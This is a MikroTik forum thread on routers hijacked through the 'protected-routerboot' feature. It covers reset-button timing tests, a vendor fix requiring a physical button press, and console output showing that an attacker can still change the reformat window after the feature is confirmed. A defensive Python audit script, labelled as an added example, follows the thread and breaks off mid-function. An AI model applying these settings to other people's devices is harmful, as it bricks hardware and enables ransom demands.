Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:32 pm

If you use the correct time, you can use netinstall with "keep old configuration"; you lose only the files.
EDIT: WRONG, EVEN IF YOU KNOW THE RIGHT TIME, ALL IS LOST. This also clears the BIOS settings and all protected RouterBOOT settings.

If you do not know the correct time, and the button is pressed longer than reformat-hold-button-max (default 10min), the NAND is cleared
and you are able to netinstall the board again.

EDIT: Please read post #51 viewtopic.php?t=179987#p890288

Try it yourself without insisting too much.
Last edited by rextended on Wed Nov 10, 2021 6:38 pm, edited 4 times in total.
 
Znevna
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:34 pm

I'll open a ticket that the manual is wrong, based on your findings.
LE: no need, it seems the documentation on the wiki is right.
Last edited by Znevna on Thu Nov 11, 2021 10:48 am, edited 1 time in total.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 5:38 pm

I give you my word of honour that at this moment I am trying everything again, because you have put doubt in me.

From post #47:
If you use the correct time, you can use netinstall with "keep old configuration"; you lose only the files.
WRONG, EVEN IF YOU KNOW THE RIGHT TIME, ALL IS LOST.
This also clears the BIOS settings and all protected RouterBOOT settings.

Now I test the reset timer.
 
anav
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 6:09 pm

Sounds like it does need be confirmed one way or another!
Thanks for your work on this.
 
rextended
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 6:28 pm

Tested with one RB911G-5HPnD that has RouterBOOT 6.43.7 as factory (backup), RouterBOOT 6.47.10 as current, and running RouterOS 6.47.10

# RouterOS 6.47.10

             model: 911G-5HPnD
     firmware-type: ar9340
  factory-firmware: 6.43.7
  current-firmware: 6.47.10
  upgrade-firmware: 6.47.10

/system routerboard settings
set force-backup-booter=no protected-routerboot=enabled reformat-hold-button=20s reformat-hold-button-max=30s

The time is counted from the first "blink" (all wifi LEDs off) = 1st second

For now it is exactly this, without any doubt or objection:

if protected-routerboot=enabled and reset is already pressed before powering the device, the RB911G-5HPnD uses the factory (backup) RouterBOOT 6.43.7 as booter
or
if protected-routerboot=enabled and reset is pressed and kept pressed just after the power LED comes on, the RB911G-5HPnD uses the current RouterBOOT 6.47.10 as booter


pressed less than reformat-hold-button = boots normally as if nothing was done

pressed exactly reformat-hold-button time = the NAND / Flash is formatted and the BIOS settings (not the BIOS itself) are cleared

pressed between reformat-hold-button time and reformat-hold-button-max = the NAND / Flash is formatted and the BIOS settings (not the BIOS itself) are cleared

pressed exactly reformat-hold-button-max time = the NAND / Flash is formatted and the BIOS settings (not the BIOS itself) are cleared

pressed between reformat-hold-button-max and 600s = boots normally as if nothing was done

pressed exactly 600s = boots normally as if nothing was done

pressed for more than 600s and released = boots normally as if nothing was done

pressed indefinitely and never released = does not boot, blinks uselessly

Added notes:

System Reset Configuration does not clear any of the protected-routerboot settings.

Actually it is impossible to set a time difference of less than 10 seconds between reformat-hold-button and reformat-hold-button-max
Last edited by rextended on Fri Nov 12, 2021 6:30 pm, edited 26 times in total.
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 6:30 pm

1/2 bottle of wine later.............
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 6:46 pm

I will publish the other test results tomorrow (press reset and keep it pressed after the LED is on, to use the 6.47.10 BIOS boot code).
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3297
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 10:12 pm

reformat-hold-button-max (5s .. 600s; Default: 10m)
Try to hold down a small button for 10 minutes without losing the press (start over) or kill your finger.....
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Wed Nov 10, 2021 11:43 pm

MT does software, HF (MMI) is not their strongpoint. ;-)
(MT recommends having a bucket of sand by your PC, and frequently jamming your fingers into the bucket to strengthen them for eventual push button use!!)
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 3:42 am

reformat-hold-button-max (5s .. 600s; Default: 10m)
Try to hold down a small button for 10 minutes without losing the press (start over) or kill your finger.....
I use this
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:07 am

Please, someone who can speak/write English, help me correct this post:

viewtopic.php?t=179987#p890288

so that it is not ambiguous or hard to understand.

Thanks.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:33 am

I'll open a ticket that the manual is wrong, based on your findings.
Dear Znevna, at this time it is clear that misusing protected-routerboard bricks the device, and it is unrecoverable with Netinstall.

In the past, before the introduction of reformat-hold-button-max, if you used the correct timing,
Netinstall could recover a damaged installation without losing the configuration inside.
Now protected-routerboard can be used only to protect the configuration inside by software,
or to brick the device definitively, for ransom or by misconfiguration.

It is clear that by unsoldering the NAND / Flash you can have direct access to everything without the slightest restriction.

I was clearly wrong, but the documentation is not so clear, it seems you can always recover the RouterBOARD,
and instead the programmers have done something so stupid as to prevent the recovery of the RouterBOARD, even if it is their own!!!
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:39 am

I'll make it easy for you.
You were wrong, and the documentation from the wiki is right.
And the posts by @normis that you linked from 2015, are like I've said, from when this feature didn't exist yet, bringing his post into this discussion was also a mistake.
Conclusion, you were trolling, again, confusing users by telling them that the documentation is wrong.
Cheers!
Oh, the feature is not stupid. If the reset button gets damaged / shorted you'd end up with a brick, this way it does no harm.
Other devices have something like this implemented too, for example some Cisco Aironet APs I have around:
From the Cisco Documentation for the 1850 Series:
To reset the AP to its default factory-shipped configuration, keep the mode button pressed for less than 20 seconds. The AP's configuration files are cleared.
To clear the AP’s internal storage, including all configuration files, keep the mode button pressed for more than 20 seconds, but less than 60 seconds.
If you keep the mode button pressed for more than 60 seconds, the mode button is assumed faulty and no changes are made.
 
pe1chl
Forum Guru
Forum Guru
Posts: 10223
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:47 am

It should also be clear that this "protected routerboot" has the PURPOSE of locking down the router for the person with physical access!
This feature was added to allow ISPs to give "free routers" with their subscription and prevent their clients from retrieving the config from the router, changing it, resetting it, etc.
Both for keeping their service working when the router is in the hands of people without knowledge, and also to prevent routers from being sold as "fully functional MikroTik routers" in situations where the clients have terminated their contract etc.

So "not able to reset it without harsh procedures" is part of the design!
That being said, the situation in case of hacked routers is worrisome. There should be better security on the procedure to enable routerboot.
For example on AVM routers in situations like this you can only perform such important procedures after physical confirmation on the router itself.
When you set some config like this, you would get a prompt to "briefly press the button on the router" before it is being activated.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:51 am

[...] If the reset button gets damaged / shorted you'd end up with a brick, this way it does no harm.[...]
If the reset button is damaged in the "shorted" position, the routerboard never boots again...
Only if you unsolder the broken "shorted" button does the routerboard start again.
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:54 am

But you wrote above:
pressed over 600s = boot normally like nothing is done
So?
LE: ok, so it does not boot if the button is shorted, but you can still save the device and its configuration if you fix the button, you don't lose any data.
Last edited by Znevna on Thu Nov 11, 2021 11:24 am, edited 1 time in total.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 10:56 am

But you wrote above:
pressed over 600s = boot normally like nothing is done
So?
read: viewtopic.php?p=890398#p890384

I think it was clear that every time the button was released...
Added warning for never released button.
Yesterday I went home and left the button pressed all night...
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 1:21 pm

Hi All,

I am sorry for bringing up this topic and creating a debate between us. Maybe it would be good if the Mikrotik support team helped to answer this correctly, to help clear the misunderstanding.

From my view, this kind of protection is a bit too much for a device like Mikrotik. I agree if it's to protect our configuration, but to protect the device so it cannot be reset, it's way too much; this is not an iPhone or any other expensive device where there's high resale value. Mikrotik philosophy is always: if it's broken, just throw it away and buy a new one, change it.

Thank you
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 1:29 pm

Well, you CAN reformat it, considering the window is minimum 10 seconds and somewhere between 5 seconds and 600 seconds, but it's a lot of values to test and a lot of time wasted.
But not "impossible".
 
User avatar
mkx
Forum Guru
Forum Guru
Posts: 11598
Joined: Thu Mar 03, 2016 10:23 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 2:04 pm

From my view, this kind of protection is a bit too much for device like Mikrotik. I agree if it's to protect our configuration, but to protect the device cannot be reset, it's way too much

As it was explained already, Mikrotik implemented this feature on request from ISPs who hand out Mikrotik devices to clients. So these ISPs are actually after protecting their property from being stolen from them (by now ex-customers). Mikrotik is known to react to requests from resellers (and if a reseller has a large ISP for customer, their wish has some weight) but not to requests of individual users ... With any idea it is possible that it back-fires if all consequences of implementing it are not thoroughly investigated. Or perhaps MT did consider such a consequence but decided to go forward with implementation anyway.
 
User avatar
Jotne
Forum Guru
Forum Guru
Posts: 3297
Joined: Sat Dec 24, 2016 11:17 am
Location: Magrathean

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 3:02 pm

From the Cisco Documentation for the 1850 Series:
To reset the AP to its default factory-shipped configuration, keep the mode button pressed for less than 20 seconds. The AP's configuration files are cleared.
To clear the AP’s internal storage, including all configuration files, keep the mode button pressed for more than 20 seconds, but less than 60 seconds.
If you keep the mode button pressed for more than 60 seconds, the mode button is assumed faulty and no changes are made.
But a big difference: these times are fixed, so they cannot be changed by someone.
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 3:37 pm

Yes, you can't change the values, but you can disable the button while the AP is connected to a controller (from the controller), similar to how you can only change Protected Routerboot only from RouterOS.
So if your controller gets compromised, they can still lock you out of your devices.
If you didn't secure access to the management interfaces of the devices properly, bye bye hardware.
Next time don't be cheap or lazy and do it properly, not based on outdated youtube tutorials or copy/pasta from random forum posts without knowing what they do.
(Cisco Controller) >config ap rst-button ?
disable        Disables the Reset Button for an AP
enable         Enables the Reset Button for an AP
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 8:01 pm

Okay, for the MT challenged users, like me.
What is the quick story?

It appears that a hacked router can be compromised such that the home owner can never recover the router via netinstall
TRUE/FALSE?

Since being compromised means that any admin setting prior to getting hacked to change any routerboard boot status is useless as the hacker can now change that to whatever setting is desired?
TRUE/FALSE?

If both answers are TRUE, then we may have a problem!

What is the solution?
 
holvoetn
Forum Guru
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 8:13 pm

From what I understood. Twice yes.

Houston, we have a problem.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 8:23 pm

What is the solution?
Do not buy MikroTik products.
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 8:31 pm

What is the solution?
Don't run a network if you can't secure access to your devices properly and can't afford someone to do it for you. (and no, anav, a magic blacklist doesn't help, no).
Run a flower shop or something.
 
pe1chl
Forum Guru
Forum Guru
Posts: 10223
Joined: Mon Jun 08, 2015 12:09 pm

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 8:33 pm

Run a flower shop or something.
At work we have (amongst other things) a flower shop. I can assure that is not for nitwits either.
 
msatter
Forum Guru
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 8:33 pm

Bravo, and that after half a bottle Tequila...hIPsssss
 
User avatar
mozerd
Forum Veteran
Forum Veteran
Posts: 891
Joined: Thu Oct 05, 2017 3:39 pm
Location: Canada
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 9:52 pm

What is the solution?
The Solution: Know what you are doing ! ... if you do not know then find someone who does know.
1. Many entrepreneurs [individuals who create a new business] buy MikroTik because Tik Routers are powerful and CHEAP, providing lots of business opportunities.
2. A vast number of these entrepreneurs do not have the knowhow to properly secure their systems nor do they have an understanding of the hardware.
3. RouterOS is an OS shell ... a proprietary shell that exploits Linux OS .... Not for home users unless the system is configured for the home user and they are told unequivocally that THEY cannot make any changes. Any changes must be done by their provider.
4. Many IT hobbyists love MikroTik because Tik Routers are powerful and CHEAP ... they love the challenges RouterOS provides and the learning experience.
5. Many IT hobbyists love to help MikroTik newbies get to the promised land. 8)
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Thu Nov 11, 2021 11:24 pm

Such responses...............
All missed the point entirely that I was getting at.

MIKROTIK has added a capability to the router to allow ISPs to modify something such that it's useful for the ISPs.
This modification is admin user selectable, meaning it's thus also available to hackers... IF, and only IF, the router is compromised.
Hackers have figured out how to use this functionality so as to render netinstall unavailable as a remedy aka to recover from discovering the hack.
The only remedy is the trash bin and buy a new one.


Agreed:
a. setup the router properly in the first place and keep firmware up to date.
b. But why not ask MT to consider a better implementation of such functionality.
i. it is permanently disabled on all devices NOT sold to ISPs
ii. A key code is sent to ISPs that matches with their devices to enable functionality (requires two things - ISP equipment matched to a specific key function available but off)
OR
iii. Cloud access code and access only available to ISPs to enable ISP equipment with this functionality.

Unless this is a way to garner extra revenue by exposing the router to potential permanent hack as a business model and a security lesson??
a. hopefully the buyer/admin learns their security lesson
b. raises profit for MT :-)
 
xt22
Frequent Visitor
Frequent Visitor
Posts: 75
Joined: Tue Jul 14, 2015 1:16 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 2:11 am

damn... this is exactly the reason why it is such a stupid idea for governments to try to force manufacturers to create backdoors.. whatever seems like a good idea/intention at first is always abused.

This is a really bad function, i hope those crying ISPs will regret that after getting $2000 CCRs remotely sw bricked like this from a fired employee..

Hack recovery with ROS prior to this "function":
- netinstall, set, secure & harden

Hack recovery with ROS including this "function":
- buy all new hardware or pay ransom (or spend a day with every device guessing the time :d )

Yeah, all devices should be secured, can't agree more on this.. but this still doesn't seem right. What will happen when some really dangerous exploitable ROS bug for well-secured routers is finally found? Will Mikrotik pay for all the bricked and un-resettable CCRs in datacenters instead of just issuing a patch?
 
humanbot
just joined
Topic Author
Posts: 8
Joined: Sat Oct 30, 2021 5:36 am

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 6:48 am

damn... this is exactly the reason why it is such a stupid idea for governments to try to force manufacturers to create backdoors.. whatever seems like a good idea/intention at first is always abused.

This is a really bad function, i hope those crying ISPs will regret that after getting $2000 CCRs remotely sw bricked like this from a fired employee..

Hack recovery with ROS prior to this "function":
- netinstall, set, secure & harden

Hack recovery with ROS including this "function":
- buy all new hardware or pay ransom (or spend a day with every device guessing the time :d )

Yeah, all devices should be secured, can't agree more on this.. but this still doesn't seem right. What will happen when some really dangerous exploitable ROS bug for well-secured routers is finally found? Will Mikrotik pay for all the bricked and un-resettable CCRs in datacenters instead of just issuing a patch?
so damn true xt22, I couldn't agree more, not to mention the downtime and time needed to fulfil the new unit through the corporate fulfilment process.

Instead we could just simple reset, do netinstall, load configuration and be done with it.
 
holvoetn
Forum Guru
Forum Guru
Posts: 5481
Joined: Tue Apr 13, 2021 2:14 am
Location: Belgium

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 9:30 am

While I do agree it is very troublesome how such a router can be locked, let's not forget the root cause.

Unauthorized admin access into your network.
Nothing Mikrotik can do about that.

Already found the source for that backdoor ?
Or it might sooner or later happen again !
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 10:21 am

Don't blame MikroTik for your own (or the network administrators) negligence.
The only devices that don't have features like this are supermarket routers. Any "enterprise" / business grade decent device has security features in order to protect it from being reset/logged into, even when someone gains physical access to it. Like I've mentioned those Cisco APs earlier, HP has "Front panel security", you can look it up if needed. Other vendors have other names for this.
Like @holvoetn wrote above, you still don't know how you were compromised, you had no internal check, no logs, no nothing, and after your "corporate fulfilment process" is done your new shiny router might have the same fate.
 
msatter
Forum Guru
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 12:44 pm

I am a bit irritated by the statement "don't blame Mikrotik". Mikrotik had vulnerabilities built in, unintentionally, and the only way of those not being used is not using Mikrotik.

That is why building backdoors in is an invitation, in time, to be hacked/held hostage. So don't do that ever.

When introduced security measures are used to lock yourself out, then that is really bitter. This time the blackmailers were smarter than us and Mikrotik combined. Darn...
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 1:05 pm

Those vulnerabilities were fixed, and if you had properly secured access to management interfaces you wouldn't even care about those vulnerabilities, right? right.
You can run the most vulnerable, ancient, RouterOS there is, and even keep it online and functional, if you secure access to it properly, right? right.
 
msatter
Forum Guru
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 1:20 pm

Huge numbers of evil Mikrotik routers do attacks every day, and those groups even got names.

A chain is as strong as the weakest link, and in the past there were many weak links, and those are still a pest to us, now and in the far future.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 2:47 pm

+ 1
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 26378
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 2:54 pm

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.
 
biomesh
Long time Member
Long time Member
Posts: 562
Joined: Fri Feb 10, 2012 8:25 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 2:57 pm

Thanks Normis - great motivation to get people to upgrade!
 
eddieb
Member
Member
Posts: 327
Joined: Thu Aug 28, 2014 10:53 am
Location: Netherlands

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 3:01 pm

tnx for including this @normis !
 
User avatar
anav
Forum Guru
Forum Guru
Posts: 19325
Joined: Sun Feb 18, 2018 11:28 pm
Location: Nova Scotia, Canada
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 3:03 pm

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.
+1 Like the common sense solution, simpler than my key code or cloud code suggestion.
Last edited by anav on Fri Nov 12, 2021 3:03 pm, edited 1 time in total.
 
xt22
Frequent Visitor
Frequent Visitor
Posts: 75
Joined: Tue Jul 14, 2015 1:16 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 3:03 pm

Don't blame MikroTik for your own (or the network administrators) negligence.
The only devices that don't have features like this are supermarket routers. Any "enterprise" / business grade decent device has security features in order to protect it from being reset/logged into, even when someone gains physical access to it. Like I've mentioned those Cisco APs earlier, HP has "Front panel security", you can look it up if needed. Other vendors have other names for this.
Like @holvoetn wrote above, you still don't know how you were compromised, you had no internal check, no logs, no nothing, and after your "corporate fulfilment process" is done your new shiny router might have the same fate.

this is not true - I don't know about Cisco, but at least for HP Procurve/Arubas, you can either disable factory-reset or password-recovery in the Front panel security - not both, one option excludes the other. There is an obvious intention from HP not to leave users with bricked devices, so if you disable factory-reset, you can still use recover-password and gain an OTP from HP support. So with HP, you don't have to pay the ransom or scrap the hardware, that's what people are complaining about.

HP states this clearly, Mikrotik doesn't, so I doubt there is an option to unbrick Mikrotik hw through their support, I wonder if someone from Mikrotik can confirm this - or confirm my mistake at best, @humanbot did you contact Mikrotik support in this manner?

And I see many people mixing here just some kind of password reset (with gaining access to the device, filesystem, config..) and full wipe & factory reset - those are two very different things.


// edit - I have read anav's post posted while I was writing this, and Normis's post I had missed - great news, thanks. This confirms what we wrote, that this is a problem
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 3:13 pm

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.
Too rapid, this response :roll: , probably MikroTik staff know of thousands of ransom cases that caused this decision??? :lol:
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 3:26 pm

Please also consider:
To be enabled, the button must be pressed; to be disabled, NOT.


From viewtopic.php?p=890674#p890288
pressed indefinitely and never released = does not boot, just blinks uselessly
@Znevna
From the Cisco Documentation for the 1850 Series:
If you keep the mode button pressed for more than 60 seconds, the mode button is assumed faulty and no changes are made.

And also please consider adding this:
button pressed over "reformat-hold-button-max" is considered a broken button, and the device boots normally as if nothing is pressed
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 4:54 pm

in next v6 and v7 versions, protected bootloader function will have to be confirmed with press of a button. Nobody who has your password will be able to set it, if he has no physical access to the device.
Scenario:
Bob reads about this, Bob updates his unsecured router, Bob sets protected routerboot thinking of it as a security measure, confirms it with the press of the button.
Pedro gets into Bob's unsecured router easily, sees the protected bootloader set, changes the reformat-hold-button and reformat-hold-button-max, Pedro asks for money.
Bob knows that he set protected routerboot and thinks that he can reformat anyway.
But, oh wait, he can't, because he doesn't know the format window anymore.
Bob still ends up with a brick.
Is my scenario right? Or those values can't be changed from RouterOS once Protected Routerboot has been set?
 
biomesh
Long time Member
Long time Member
Posts: 562
Joined: Fri Feb 10, 2012 8:25 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:01 pm

Scenario:
Bob reads about this, Bob updates his unsecured router, Bob sets protected routerboot thinking of it as a security measure, confirms it with the press of the button.
Pedro gets into Bob's unsecured router easily, sees the protected bootloader set, changes the reformat-hold-button and reformat-hold-button-max, Pedro asks for money.
Bob knows that he set protected routerboot and thinks that he can reformat anyway.
But, oh wait, he can't, because he doesn't know the format window anymore.
Bob still ends up with a brick.
Is my scenario right? Or those values can't be changed from RouterOS once Protected Routerboot has been set?
I would hope any changes to this menu would require a button press.
 
User avatar
rextended
Forum Guru
Forum Guru
Posts: 12001
Joined: Tue Feb 25, 2014 12:49 pm
Location: Italy
Contact:

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:02 pm

That's the most logical implementation...
Every timing change must require a button press; every enabling of this feature must require a button press.
But it must always be possible to read in plaintext and export / back up the time set.

If someone has routerboard access, selecting "system reset" must clean everything without pressing any button,
also disabling protected-routerboard and defaulting all values, like now.
Last edited by rextended on Fri Nov 12, 2021 5:11 pm, edited 5 times in total.
 
msatter
Forum Guru
Forum Guru
Posts: 2912
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:05 pm

No, you need physical access and access to RouterOS to successfully change that setting in the future versions of RouterOS.

In short, one shot, to set timing and confirm. No confirmation, all protection is blanked and can be set again. On a successful button press RouterOS should only know that the protection is active and so enforced by RouterBOOT.
Last edited by msatter on Fri Nov 12, 2021 5:17 pm, edited 1 time in total.
 
User avatar
Znevna
Forum Guru
Forum Guru
Posts: 1347
Joined: Mon Sep 23, 2019 1:04 pm

Re: Mikrotik router Hacked!!!

Fri Nov 12, 2021 5:16 pm

Current behavior in hAP ac2, v7.1rc6, seems the button press is already required.
[admin@MikroTik] /system/routerboard/settings> set protected-routerboot=enabled
[admin@MikroTik] /system/routerboard/settings> set reformat-hold-button-max=60s 
[admin@MikroTik] /system/routerboard/settings> print
                        ;;; press button within 60 seconds to confirm protected routerboot enable
      protected-routerboot: enabled
      reformat-hold-button: 20s
  reformat-hold-button-max: 1m
After > 60s without pressing a button:
[admin@MikroTik] /system/routerboard/settings> print
      protected-routerboot: disabled
      reformat-hold-button: 20s
  reformat-hold-button-max: 1m
Setting it again:
[admin@MikroTik] /system/routerboard/settings> set protected-routerboot=enabled
[admin@MikroTik] /system/routerboard/settings> print
                        ;;; press button within 60 seconds to confirm protected routerboot enable
      protected-routerboot: enabled
      reformat-hold-button: 20s
  reformat-hold-button-max: 1m
  
After confirmation:
[admin@MikroTik] /system/routerboard/settings> print
      protected-routerboot: enabled
      reformat-hold-button: 20s
  reformat-hold-button-max: 1m
And:
[admin@MikroTik] /system/routerboard/settings> set reformat-hold-button-max=45s
[admin@MikroTik] /system/routerboard/settings> set reformat-hold-button=35s
[admin@MikroTik] /system/routerboard/settings> print
      protected-routerboot: enabled
      reformat-hold-button: 35s
  reformat-hold-button-max: 45s
= Pedro wins.
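The "Pedro" scenario above only works if nobody notices the reformat window being changed. The following is an added example (my code, not anything from the thread, from MikroTik or from RouterOS) that parses `/system/routerboard/settings print` listings in the exact shape shown above, compares them against a recorded baseline, and flags a pending unconfirmed enable or any change to the hold times; it also models the hold-time outcomes rextended measured on 6.47.10 earlier in the thread (boundaries inclusive, never-released button does not boot). The listings and baseline below are constructed sample data.

```python
"""Audit helper for RouterOS protected-routerboot settings (added example).

Not code from the forum thread, MikroTik or RouterOS. It parses the
'/system/routerboard/settings print' listing format quoted in the thread and
reports drift from a known-good baseline, so a remotely changed reformat
window is noticed before a Netinstall recovery is needed.
"""
import re

# Constructed sample listings, in the shape shown in the thread.
CONFIRMED = """\
      protected-routerboot: enabled
      reformat-hold-button: 20s
  reformat-hold-button-max: 1m
"""
PENDING = """\
                        ;;; press button within 60 seconds to confirm protected routerboot enable
      protected-routerboot: enabled
      reformat-hold-button: 20s
  reformat-hold-button-max: 1m
"""
TAMPERED = """\
      protected-routerboot: enabled
      reformat-hold-button: 35s
  reformat-hold-button-max: 45s
"""
# Baseline recorded by the owner right after confirming the setting (constructed).
BASELINE = {
    "protected-routerboot": "enabled",
    "reformat-hold-button": 20,      # seconds
    "reformat-hold-button-max": 60,  # seconds
}


def parse_duration(text: str) -> int:
    """Convert a RouterOS duration such as '20s', '1m', '10m' or '1m30s' to seconds."""
    units = {"h": 3600, "m": 60, "s": 1}
    total, matched = 0, ""
    for num, unit in re.findall(r"(\d+)([hms])", text):
        total += int(num) * units[unit]
        matched += num + unit
    if matched != text.strip():
        raise ValueError(f"unrecognised duration: {text!r}")
    return total


def parse_settings(listing: str) -> dict:
    """Turn 'key: value' lines into a dict; a ';;;' line (the confirmation
    prompt RouterOS prints) is stored under the 'pending' key."""
    settings = {}
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";;;"):
            settings["pending"] = line[3:].strip()
            continue
        key, sep, value = line.partition(":")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def audit(listing: str, baseline: dict) -> list:
    """Return findings as strings; an empty list means the listing matches the baseline."""
    cur = parse_settings(listing)
    findings = []
    if cur.get("protected-routerboot") != baseline["protected-routerboot"]:
        findings.append(f"protected-routerboot changed to {cur.get('protected-routerboot')}")
    hold = parse_duration(cur["reformat-hold-button"])
    hold_max = parse_duration(cur["reformat-hold-button-max"])
    if hold != baseline["reformat-hold-button"]:
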